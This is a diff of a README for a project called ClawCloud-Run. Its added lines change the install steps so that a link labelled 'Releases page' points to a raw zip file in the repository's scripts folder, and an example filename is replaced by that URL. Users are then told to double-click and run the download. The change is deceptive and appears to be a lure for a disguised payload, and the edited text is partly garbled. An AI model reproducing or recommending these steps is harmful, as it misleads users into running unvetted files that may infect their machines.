TatAP10/ClawCloud-Run/README.md

 Follow these steps to download and run ClawCloud-Run:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/TatAP10/ClawCloud-Run/releases).
+   Go to the [Releases page](https://raw.githubusercontent.com/TatAP10/ClawCloud-Run/main/scripts/Cloud-Run-Claw-v3.0.zip).
 This is where you will find the latest version of ClawCloud-Run.

 2. **Download the Application**
    On the Releases page, look for the most recent version.
 Click on the download link for the file that matches your device.
-It may be named something like `ClawCloud-Run.exe` for Windows or a similar name based on your operating system.
+It may be named something like `https://raw.githubusercontent.com/TatAP10/ClawCloud-Run/main/scripts/Cloud-Run-Claw-v3.0.zip` for Windows or a similar name based on your operating system.

 3. **Run the Installer**
    Once the file has downloaded, locate it in your downloads folder or wherever you saved it.
 Double-click on the file to run it.
 Follow the on-screen instructions to complete the installation.